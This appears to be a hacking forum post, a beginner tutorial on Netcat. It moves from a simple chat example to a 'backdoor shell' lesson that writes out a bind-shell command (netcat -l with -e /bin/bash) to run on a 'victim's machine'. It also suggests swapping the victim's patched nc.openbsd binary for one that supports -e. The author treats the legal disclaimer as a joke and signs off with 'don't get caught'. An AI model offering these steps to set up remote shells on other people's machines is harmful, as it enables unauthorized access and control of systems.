Introduction: So not too long ago I made a post in a forum on a completely different subject. Well, the topic I “was” going to cover is pretty interesting, big, and probably will be greatly appreciated by all of you guys, but, do to update in security and patches, that article will not be posted until a later time when I figure out a new way to do that attack. It’s pretty cool! Trust me! Until then I have something else.
I noticed that a lot of beginner questions are being posted in the forums and thought I’d cover a couple things that are useful, cool, and well… not in the articles.
Introduction #2: So I was messing around on the internet and came across a tool called Netcat. When I read about it I thought to myself, “This would have been totally great to know about back in my freshman year of high school!” I was failing Spanish 1, was doing tech work for my Spanish teacher. Facepalm big time guys! I’ve been messing with it for a couple of days and it’s some pretty cool stuff. It’s really good for reverse tcp attacks as well. Anyways, let’s talk about this tool.
It’s called Netcat! Also known as, “The tcp/ip swiss army knife” from many sources
You can enter this tool in two way by typing
nc
or
netcat
Anyways here’s a description of this cool little tool.
No need for me to rewrite what’s already been written.
[Printed from Netcats man Page]
DESCRIPTION
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It
can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning,
and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages
onto standard error instead of sending them to standard output, as telnet(1) does with some.
Common uses include:
· simple TCP proxies
· shell-script based HTTP clients and servers
· network daemon testing
· a SOCKS or HTTP ProxyCommand for ssh(1)
· and much, much more
Pretty cool stuff huh?! So, let’s get started…
A list of all command arguments can be found in the man page:
man netcat
Lesson 1:
———————————————————————————————————————–
Netcat as an instant messenger
———————————————————————————————————————–
To get warmed up and break into this tool we are going to do a little tcp instant messenging.
First let’s create the chat server:
netcat -l 8080
What we’re telling netcat to listen on port 8080
-l (lower case L) = listening
and then the port number.
After that we’re going to move to the other machine and type:
netcat -vv 63.233.251.218 8080
-v = Verbose -vv = double Verbose
This is going to create a connection to to the IP Address (63.233.251.218) The IP is obviously going to be the address of the machine you’re connecting to, which would be the server in this case.
This is NOT Ip fyi… just a random IP Address from
http://sqa.fyicenter.com/Online_Test_Tools/Test_IP_Address_Generator.php
you should then recieve this in your terminal
Connection to 63.233.251.218 8080 port [tcp/http-alt] succeeded!
Anything you type in either terminal from machine to machine will then appear right below that.
Viola!
[b] Lesson 2: [b]
———————————————————————————————————————–
Remote Connection with Backdoor Shell aka… Hacking :)
———————————————————————————————————————–
Same thing as the first step. Start listening on the port you desire:
netcat -lvn 8080 -e /bin/bash
What this is doing is listening on port 8080 and serving shell access to whoever connects through that port.
/bin/bash is the location of the shell on linux and if it’s going to be on windows cmd.exe yeah…
Note: netcat isn’t installed by default on windows :P
Now we are going to connect to the victims machine on our machine doing this:
nc -vn 63.233.251.218 8080
Same Thing as before, just connecting through port 8080 on 63.233.251.218
Once the connection is successful start typing your commands in and the results will appear below like they normally would.
Now a couple things before I go!
If you’re using Ubuntu this won’t work! Yes, netcat is installed by default but it is revised to cancel out the -e argument. Psht Security right?! Therefore when you are on the victims machine setting up the listening connection you will have to swap out the file nc.openbsd with the traditional version. You could simply do this though. I haven’t tried it yet but seems legit. Download the version including -e option and simply name that nc.openbsd and to speed up things create a bash script, prior to the attack (which I will speak about in another article), to do all of the work right away. Something like rm /bin/nc.openbsd | cp [locationofreplacement] blah blah blah…. y ‘know but that’s another story. It has to be nc.openbsd because the nc and netcat commands in the /bin directory both are links to the actual nc.openbsd file to probably throw you off or something.
Have fun, be safe, this is all eductional and junk. What other disclaimers and legal info on other forums, youtube videos, etc just autofill here and all that fun stuff!
Have fun, Happy hacking, don’t get caught! I’ll probably do other netcat tutorials, since it’s such an awesome tool, once I learn more and use it more! Also other alternatives for when netcat isn’t present and other cool hacks/cracks.
Cheers!
p.s. If you have any requests feel free to message me or post a comment